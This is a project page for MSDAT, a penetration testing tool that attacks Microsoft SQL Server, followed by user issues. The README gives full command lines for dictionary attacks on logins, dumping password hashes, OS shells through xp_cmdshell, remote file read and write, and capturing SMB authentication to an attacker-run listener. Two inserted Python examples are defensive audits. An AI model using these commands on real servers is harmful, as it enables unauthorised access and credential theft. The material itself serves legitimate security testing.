
msdat's Introduction

Quentin HARDY
[email protected]
[email protected]

MSDAT

MSDAT (Microsoft SQL Database Attacking Tool) is an open source penetration testing tool that tests the security of Microsoft SQL Databases remotely.

Usage examples of MSDAT:

  • You have a Microsoft database listening remotely and you want to find valid credentials in order to connect to the database
  • You have a valid Microsoft SQL account on a database and you want to escalate your privileges
  • You have a valid Microsoft SQL account and you want to execute commands on the operating system hosting this DB (e.g. xp_cmdshell, OLE Automation, Agent Jobs)

Tested on Microsoft SQL Server 2005, 2008, 2012, 2014, 2016 and 2019.

Changelog

  • Version 2.4 (2022/12/28):
    • 2 new options in search module: --privs and --privs-full for getting current user roles and privileges (e.g. login and database privileges)
    • 1 new option in search module: --config for getting database configuration & information (version, databases, users, disabled users, stored procedures, etc.)
  • Version 2.3 (2022/12/18):
    • compatible with Microsoft SQL Server 2019
    • new option --schema-dump in search module for extracting the schema and saving it to a file (except for default DBs)
    • new option --table-dump in search module for extracting all tables and saving them to a file (except for default DBs)
    • new option --sql-shell in search module for getting a minimal pseudo SQL shell
  • Version 2.2 (2022/04/29):
    • --nmap-file and -l can now be used in all modules, including the passwordguesser module. You can give a list of targets with -l or an nmap XML file with --nmap-file.
    • Multiple bug fixes
  • Version 2.1 (2020/03/04):
    • Option --nmap-file for loading all mssql services from an XML nmap file (python-libnmap has to be installed)
  • Version 2.0 (2020/03/04):
    • Python 2 to Python 3: MSDAT is compatible with Python 3 only now. Python 2 is not supported.
    • Separator option in password guesser module
    • Improvements in error catching in --put-file option of xpcmdshell module
    • Improvements in reverse shell option of jobs module
    • OLE automation module - command execution improvements
    • OLE automation module - Powershell reverse shell implemented
    • new option for printing the list of agent jobs and their code: --print-jobs
  • Version 1.2 (2020/02/26):
    • New method in xpCmdShell module: Upload a binary file with powershell (--put-file)
    • Improvement in oleAutomation: upload the file in binary mode instead of as a text file
  • Version 1.1 (2019/07/12):
  • Version 1.0 (2017/02/15):
    • first version released

Features

Thanks to MSDAT (Microsoft SQL Database Attacking Tool), you can (non-exhaustive list):

  • get technical information (e.g. database version) about an MSSQL database without being authenticated
  • load an nmap file for scanning all MSSQL targets
  • search MSSQL accounts with a dictionary attack
  • test each login as password (authentication required)
  • get a Windows shell on the database server with:
    • xp_cmdshell
    • OLE Automation
    • Jobs
  • download files remotely with:
    • OLE Automation
    • bulkinsert
    • openrowset
  • upload files to the server with:
    • OLE Automation
    • openrowset
  • capture an SMB authentication thanks to:
    • bulkinsert
    • openrowset
    • xp_dirtree
    • xp_fileexist
    • xp_getfiledetails
  • steal MSSQL hashed passwords, on any MSSQL version
  • scan ports through the database:
    • openrowset
  • execute SQL requests on a remote MSSQL server through the database (target) with:
    • bulkinsert
    • openrowset
  • list files/directories with:
    • xp_subdirs
    • xp_dirtree
  • list drives/media with:
    • xp_fixeddrives
    • xp_availablemedia
  • create a folder with:
    • xp_create_subdir
  • search sensitive data in tables (e.g. credentials)
  • get database configuration (databases, users, stored procedures, etc.)
  • extract schema and all table information
  • execute basic SQL commands in a pseudo SQL shell

Installation

Some dependencies must be installed in order to run MSDAT.

On Ubuntu:

sudo apt-get install freetds-dev 

or download freetds on http://www.freetds.org/

Install python dependencies:

sudo pip3 install -r requirements.txt
sudo activate-global-python-argcomplete

or

sudo pip3 install cython colorlog termcolor pymssql argparse python-libnmap
sudo pip3 install argcomplete && sudo activate-global-python-argcomplete

Add "use ntlmv2 = yes" in your freetds configuration file (ex: /etc/freetds/freetds.conf or /usr/local/etc/freetds.conf). Example:

[global]
        # TDS protocol version
        tds version = 8.0
        use ntlmv2 = yes

How to begin

python3 msdat.py -h
usage: msdat.py [-h] [--version]
                {all,mssqlinfo,passwordguesser,passwordstealer,xpcmdshell,jobs,smbauthcapture,oleautomation,bulkopen,xpdirectory,trustworthype,userlikepwd,search,cleaner}
                ...

               _   _  __  __   _  ___ 
              | \_/ |/ _||  \ / \|_ _|
              | \_/ |\_ \| o ) o || | 
              |_| |_||__/|__/|_n_||_| 
                        
------------------------------------------------------
 _   _  __            __           _           ___ 
| \_/ |/ _|         |  \         / \         |_ _|
| \_/ |\_ \         | o )         o |         | | 
|_| |_||__/icrosoft |__/atabase |_n_|ttacking |_|ool 
                        
-------------------------------------------------------

By Quentin Hardy ([email protected])

positional arguments:
  {all,mssqlinfo,passwordguesser,passwordstealer,xpcmdshell,jobs,smbauthcapture,oleautomation,bulkopen,xpdirectory,trustworthype,userlikepwd,search,cleaner}
                        
                        Choose a main command
    all                 to run all modules in order to know what it is possible to do
    mssqlinfo           to get information without authentication
    passwordguesser     to know valid credentials
    passwordstealer     to get hashed passowrds
    xpcmdshell          to get a shell
    jobs                to execute system commands
    smbauthcapture      to capture a SMB authentication
    oleautomation       to read/write file and execute system commands
    bulkopen            to read a file and scan ports
    xpdirectory         to list files/drives and to create directories
    trustworthype       to become sysadmin with the trustwothy database method
    userlikepwd         to try each MSSQL username stored in the DB like the corresponding pwd
    search              to search in column names
    cleaner             clean local traces

optional arguments:
  -h, --help            show this help message and exit
  --version             show program's version number and exit

Examples

Modules

  • You can list all modules:
./msdat.py -h
  • When you have chosen a module (example: all), you can use it and you can list all features and options of the module:
./msdat.py all -h

You can find out whether a specific module can be used on an MSSQL server thanks to the --test-module option. This option is implemented in each msdat module.

all module

The all module allows you to run all modules (depending on the options you have chosen).

python msdat.py all -s $SERVER

If you want:

  • to use your own account file for the dictionary attack
  • to try multiple passwords for a user without being asked for confirmation
  • to define your own timeout value

./msdat.py all -s $SERVER -p $PORT --accounts-file accounts.txt --login-timeout 10 --force-retry

In each module, you can define the charset to use with the --charset option.

mssqlinfo module

To get technical information about a remote MSSQL server without being authenticated:

./msdat.py mssqlinfo -s $SERVER -p $PORT --get-max-info

This module uses the TDS protocol and the SQL Server Browser service to get information.

passwordguesser module

This module allows you to search for valid credentials:

./msdat.py passwordguesser -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --force-retry --search

The --force-retry option allows testing multiple passwords for each user without asking you for confirmation.

You can specify your own account file with the --accounts-file option:

./msdat.py passwordguesser -s $SERVER -p $PORT --search --accounts-file accounts.txt --force-retry

passwordstealer module

To dump hashed passwords:

./msdat.py passwordstealer -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --dump --save-to-file test.txt

This module has been tested on SQL Server 2000, 2005, 2008 and 2014.

xpcmdshell module

To execute system commands thanks to xp_cmdshell (https://msdn.microsoft.com/en-us/library/ms190693.aspx):

./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD --shell

The previous command gives you an interactive shell on the remote database server.

If xp_cmdshell is not enabled, the --enable-xpcmdshell option can be used in this module to activate it:

./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD --enable-xpcmdshell --disable-xpcmdshell --shell

The --enable-xpcmdshell option enables xp_cmdshell if it is not enabled (not enabled by default).

The --disable-xpcmdshell option disables xp_cmdshell if this one is enabled.
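A defender's counterpart to the switches the xpcmdshell, oleautomation, bulkopen and trustworthype modules depend on, as an added Python example that is not part of MSDAT: it carries the two T-SQL queries a DBA would run to collect the relevant sys.configurations and sys.databases rows, and turns such rows into findings, each with the statement that closes it. The result sets embedded below are constructed, and treating sa as the only sysadmin login is an assumption the caller should replace with the real list.

```python
"""Audit the SQL Server switches that MSDAT's xpcmdshell, oleautomation, bulkopen
and trustworthype modules depend on. Added example; not part of MSDAT."""
from dataclasses import dataclass

# T-SQL to collect the inputs evaluated below (run it with sqlcmd or any client).
# sys.configurations lists every sp_configure option whatever 'show advanced
# options' is set to, so the three switches are always visible here.
AUDIT_CONFIG_SQL = """
SELECT name, CAST(value_in_use AS int) AS value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures', 'Ad Hoc Distributed Queries');
"""
AUDIT_TRUSTWORTHY_SQL = """
SELECT name, is_trustworthy_on, SUSER_SNAME(owner_sid) AS owner
FROM sys.databases;
"""

# Which MSDAT capability each enabled switch exposes (from the README's module list).
RISKY_OPTIONS = {
    "xp_cmdshell": "xpcmdshell module (OS command execution)",
    "Ole Automation Procedures": "oleautomation module (file read/write, OS command execution)",
    "Ad Hoc Distributed Queries": "bulkopen module (openrowset file read, port scan, remote queries)",
}


@dataclass
class Finding:
    severity: str      # "high" or "medium"
    subject: str       # option or database name
    detail: str
    remediation: str   # T-SQL statement that closes the finding


def quotename(identifier):
    """Bracket-quote an identifier like T-SQL QUOTENAME(): ']' inside is doubled."""
    return "[" + identifier.replace("]", "]]") + "]"


def assess_configurations(rows):
    """rows: iterable of (name, value_in_use) as returned by AUDIT_CONFIG_SQL."""
    findings = []
    for name, value_in_use in rows:
        if name in RISKY_OPTIONS and int(value_in_use) == 1:
            findings.append(Finding(
                "high", name,
                f"'{name}' is enabled; the {RISKY_OPTIONS[name]} relies on it",
                f"EXEC sp_configure '{name}', 0; RECONFIGURE;"))
    return findings


def assess_trustworthy(rows, sysadmin_logins=("sa",)):
    """rows: iterable of (name, is_trustworthy_on, owner) from AUDIT_TRUSTWORTHY_SQL.

    msdb is TRUSTWORTHY by design and is skipped. Any other TRUSTWORTHY database is
    reported; it is rated high when its owner is a sysadmin login, because that is
    the condition the trustworthype method needs (db_owner there can act as the
    owner). Assumption: the caller passes the real sysadmin logins; 'sa' is only
    the default used here.
    """
    findings = []
    for name, is_trustworthy_on, owner in rows:
        if name == "msdb" or not int(is_trustworthy_on):
            continue
        severity = "high" if owner in sysadmin_logins else "medium"
        findings.append(Finding(
            severity, name,
            f"database {name} has TRUSTWORTHY ON and is owned by {owner}",
            f"ALTER DATABASE {quotename(name)} SET TRUSTWORTHY OFF;"))
    return findings


def audit(config_rows, db_rows, sysadmin_logins=("sa",)):
    """Combine both checks; returns findings in query order, configurations first."""
    return assess_configurations(config_rows) + assess_trustworthy(db_rows, sysadmin_logins)


# Constructed sample result sets, shaped like the two queries' output.
SAMPLE_CONFIG_ROWS = [
    ("xp_cmdshell", 1),
    ("Ole Automation Procedures", 0),
    ("Ad Hoc Distributed Queries", 1),
]
SAMPLE_DB_ROWS = [
    ("master", 0, "sa"),
    ("msdb", 1, "sa"),                   # expected, not reported
    ("hr", 1, "sa"),                     # high: TRUSTWORTHY and sysadmin-owned
    ("reporting", 1, "APP\\reportsvc"),  # medium: TRUSTWORTHY, non-sysadmin owner
    ("sales", 0, "sa"),
]

if __name__ == "__main__":
    for f in audit(SAMPLE_CONFIG_ROWS, SAMPLE_DB_ROWS):
        print(f"[{f.severity}] {f.subject}: {f.detail}")
        print(f"    fix: {f.remediation}")
```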

smbauthcapture module

Thanks to this module, you can capture an SMB authentication:

./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --capture $MY_IP_ADDRESS --share-name SHARE

To capture the SMB authentication, the auxiliary/server/capture/smb (http://www.rapid7.com/db/modules/auxiliary/server/capture/smb) module of metasploit could be used:

msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > exploit

The capture command of this module tries to capture an SMB authentication thanks to the xp_dirtree, xp_fileexist or xp_getfiledetails procedure.

If you want to choose the SMB authentication procedure to capture the authentication:

./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD --xp-dirtree-capture 127.0.0.1
./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD --xp-fileexist-capture 127.0.0.1
./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD --xp-getfiledetails-capture 127.0.0.1

You can change the SHARE name with the --share-name option.

oleautomation module

This module can be used to read/write files on the database server.

The following command reads the file temp.txt stored on the database server:

./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --read-file 'C:\Users\Administrator\Desktop\temp.txt'

To write a string in a file (temp.txt) remotely:

./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --write-file 'C:\Users\Administrator\Desktop\temp.txt' 'a\nb\nc\nd\ne\nf'

This module can be used to download a file (C:\Users\Administrator\Desktop\temp.txt) stored on the database server:

./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --get-file 'C:\Users\Administrator\Desktop\temp.txt' temp.txt

Also, you can use this module to upload a file (temp.txt) on the target:

./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --put-file temp.txt 'C:\Users\Administrator\Desktop\temp.txt'

bulkopen module

The module bulkopen can be used:

  • to read/download files stored on a database server
  • to scan ports through the database server
  • to execute SQL requests on a remote MSSQL server through the database

To read a file stored in the target, the following command can be used:

./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --read-file 'C:\Users\Administrator\Desktop\temp.txt'

The --method option can be used to specify the method to use:

./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --read-file 'C:\Users\Administrator\Desktop\temp.txt' --method openrowset

To download a file (C:\Users\Administrator\Desktop\temp.txt):

./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --get-file 'C:\Users\Administrator\Desktop\temp.txt' temp.txt

This module can be used to scan ports (1433 and 1434 of 127.0.0.1) through the database server:

./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --scan-ports 127.0.0.1 1433,1434 -v

You can scan a range of ports:

./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --scan-ports 127.0.0.1 1433-1438

This module can be used to execute SQL requests (ex: select @@ServerName) on a remote database server (ex: $SERVER2) through the database ($SERVER):

./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --request-rdb $SERVER2 $PORT $DATABASE $USER $PASSWORD 'select @@ServerName'

xpdirectory module

The module xpdirectory can be used:

  • to list:
    • files
    • directories
    • drives
  • to check if a file exists
  • to create a directory

To list files in a specific directory:

./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --list-files 'C:\'

To list directories in a specific directory:

./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --list-dir 'C:\'

To list drives:

./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --list-fixed-drives --list-available-media

To check if a file exists:

./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --file-exists 'C:\' --file-exists 'file.txt'

To create a directory:

./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --create-dir 'C:\temp'

search module

The module search can be used to search for a pattern in the column names of tables and views. It is useful, for example, to search for the pattern %password% in column names.

To get column names that contain password patterns (e.g. passwd, password, motdepasse, clave):

./msdat.py search -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --pwd-column-names --show-empty-columns

If you also want to see column names whose columns contain no data, use the --show-empty-columns option.

To search for a specific pattern in the column names of views and tables:

./msdat.py search -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --pwd-column-names --show-empty-columns

Donation

If you want to support my work with a donation, I will appreciate it a lot:

  • Via BTC: 36FugL6SnFrFfbVXRPcJATK9GsXEY6mJbf

msdat's People

Contributors

mrtchuss, quentinhardy


msdat's Issues

wordlist account format

What format for the wordlist is accepted by passwordguesser?
In the example: sa/sa
What is the meaning? Thanks.

xp_cmdshell Run Specific Command

My team uses msdat non-interactively against a ton of machines using GNU's parallel command. It'd be nice if the xp_cmdshell module supported running a specific user provided command such as whoami rather than prompting for an interactive session/command. Both options WOULD be nice to have. Having this feature would allow us to more easily test plenty of MSSQL servers over running one at a time.

Multiple Server Support

It would be cool if we added a flag such as -sL to run the intended module(s) against multiple servers at once. I am already wrapping msdat in a Bash script. This would be a line-delimited text file of servers rather than an nmap input file.

I see that multiple hosts are supported for password guessing:

PPpassguesser.add_argument('-l', dest='hostlist', required=False, help='filename which contains hosts (one ip on each line: "ip:port" or "ip" only)')
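The -l host-list format quoted above ("ip:port" or "ip", one per line) and the --nmap-file option from the changelog describe the same target inventory. As an added Python example that is not part of MSDAT, the function below derives that host list from an nmap XML scan of your own network using only the standard library (python-libnmap is what MSDAT itself requires). The nmap XML embedded below is constructed; only IPv4 hosts are emitted, because "ip:port" cannot carry an IPv6 address unambiguously.

```python
"""Build an 'ip:port'-per-line host list of SQL Server listeners from nmap XML.
Added example; not part of MSDAT and independent of python-libnmap."""
import xml.etree.ElementTree as ET

# Service names nmap assigns to SQL Server: ms-sql-s is the TDS listener (1433/tcp
# by default), ms-sql-m is the SQL Server Browser (1434/udp), which the mssqlinfo
# module queries for unauthenticated version information.
TDS_SERVICE = "ms-sql-s"
BROWSER_SERVICE = "ms-sql-m"
DEFAULT_TDS_PORT = 1433


def mssql_targets_from_nmap_xml(xml_text, include_browser=False):
    """Return sorted, de-duplicated 'ip:port' strings for open SQL Server ports.

    Only hosts reported up are considered. A port counts when nmap named its
    service ms-sql-s (or ms-sql-m, when include_browser is set), or, when -sV
    produced no service name, when it is 1433/tcp. Hosts without an IPv4
    address are skipped (the 'ip:port' format is ambiguous for IPv6).
    """
    root = ET.fromstring(xml_text)
    targets = set()
    for host in root.iter("host"):
        status = host.find("status")
        if status is not None and status.get("state") != "up":
            continue
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        addr = addr_el.get("addr")
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            proto = port.get("protocol")
            portid = int(port.get("portid"))
            service = port.find("service")
            name = service.get("name") if service is not None else None
            if name == TDS_SERVICE and proto == "tcp":
                targets.add((addr, portid))
            elif name == BROWSER_SERVICE and include_browser:
                targets.add((addr, portid))
            elif name is None and proto == "tcp" and portid == DEFAULT_TDS_PORT:
                targets.add((addr, portid))
    return [f"{addr}:{port}" for addr, port in sorted(targets)]


def write_hostlist(path, targets):
    """Write the list in the one-target-per-line format msdat's -l option reads."""
    with open(path, "w", encoding="ascii") as fd:
        fd.write("\n".join(targets) + "\n")
    return len(targets)


# Constructed nmap -sV output: one host with TDS and Browser, one on a
# non-default port with 1433 closed, one down, one unnamed open 1433.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -sU -sT -p T:1433,1435,U:1434 10.0.0.0/29">
  <host><status state="up"/><address addr="10.0.0.5" addrtype="ipv4"/><ports>
    <port protocol="tcp" portid="1433"><state state="open"/>
      <service name="ms-sql-s" product="Microsoft SQL Server 2019"/></port>
    <port protocol="udp" portid="1434"><state state="open"/><service name="ms-sql-m"/></port>
  </ports></host>
  <host><status state="up"/><address addr="10.0.0.6" addrtype="ipv4"/><ports>
    <port protocol="tcp" portid="1435"><state state="open"/><service name="ms-sql-s"/></port>
    <port protocol="tcp" portid="1433"><state state="closed"/></port>
  </ports></host>
  <host><status state="down"/><address addr="10.0.0.7" addrtype="ipv4"/><ports>
    <port protocol="tcp" portid="1433"><state state="open"/><service name="ms-sql-s"/></port>
  </ports></host>
  <host><status state="up"/><address addr="10.0.0.8" addrtype="ipv4"/><ports>
    <port protocol="tcp" portid="1433"><state state="open"/></port>
  </ports></host>
</nmaprun>
"""

if __name__ == "__main__":
    for line in mssql_targets_from_nmap_xml(SAMPLE_NMAP_XML, include_browser=True):
        print(line)
```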

No module named pymssql

hi there, could you please help me with this
root@kali:/Downloads/mssql/msdat# ./msdat.py -h
Traceback (most recent call last):
File "./msdat.py", line 10, in
from Mssql import Mssql
File "/root/Downloads/mssql/msdat/Mssql.py", line 6, in
import pymssql, _mssql, decimal
ImportError: No module named pymssql
root@kali:/Downloads/mssql/msdat# pip3 install pymssql
Requirement already satisfied: pymssql in /usr/local/lib/python3.8/dist-packages (2.1.5)

xp_cmdshell Restore Service to Identified State

My team uses msdat non-interactively against a ton of machines using GNU's parallel command. We like to check and see if xp_cmdshell can be executed. Currently xp_cmdshell allows the user to enable or disable the xp. However, I'd like to be able to restore the xp_cmdshell to how we found it so that I am not leaving xp_cmdshell enabled if was already disabled on client environments.

So the breakdown would be:

  1. If xp_cmdshell is disabled and can be enabled:
    1. Enable
    2. Execute
    3. Disable
  2. If xp_cmdshell is enabled:
    1. Execute

Project dependencies may have API risk issues

Hi, In msdat, inappropriate dependency versioning constraints can cause risks.

Below are the dependencies and version constraints that the project is using

cython
colorlog
termcolor
pymssql
argparse
python-libnmap
argcomplete

The version constraint == will introduce the risk of dependency conflicts because the scope of dependencies is too strict.
The version constraint No Upper Bound and * will introduce the risk of the missing API Error because the latest version of the dependencies may remove some APIs.

After further analysis, in this project,
The version constraint of dependency cython can be changed to ==3.0.0a10.
The version constraint of dependency colorlog can be changed to >=0.1,<=0.4.
The version constraint of dependency colorlog can be changed to >=1.4,<=1.8.
The version constraint of dependency colorlog can be changed to >=6.3.0a1,<=6.6.0.
The version constraint of dependency argparse can be changed to >=1.2.1,<=1.4.0.
The version constraint of dependency argcomplete can be changed to >=0.1.7,<=0.7.1.

The above modification suggestions can reduce the dependency conflicts as much as possible,
and introduce the latest version as much as possible without calling Error in the projects.

The invocation of the current project includes all the following methods.

@developer
Could please help me check this issue?
May I pull a request to fix it?
Thank you very much.

Output/Log to File

I would like the tool to output results to file. Understanding this tool has many different modules, a standardized machine readable file type such as CSV may be difficult. However, having the tool output timestamps of actions and results would allow the tool to be run with persistent results. I see that something was started here, but was commented out:

#PPoutput.add_argument('--output-file',dest='outputFile',default=None,required=False,help='save results in this file')

xp_dirtree Incorrect Result

Hi, I am working through the HackTheBox machine, Escape, and I found that xp_dirtree was incorrectly reported as not supported.

I used impacket-mssqlclient and DBeaver to run exec xp_dirtree '\\#.#.#.#\share' which successfully connected to my Responder instance providing a NetNTLMv2 hash. The user I am using holds public access only.

Looking at the verbose comments, my guess is that this particular box does not have a C:\. I'll continue working and see if this box has a C:\ later on. What I find interesting is that the result was an empty list [], not a SQL error. I am no expert at SQL, but could we modify the xpdirectory module to check if [] was returned and not a SQL error?
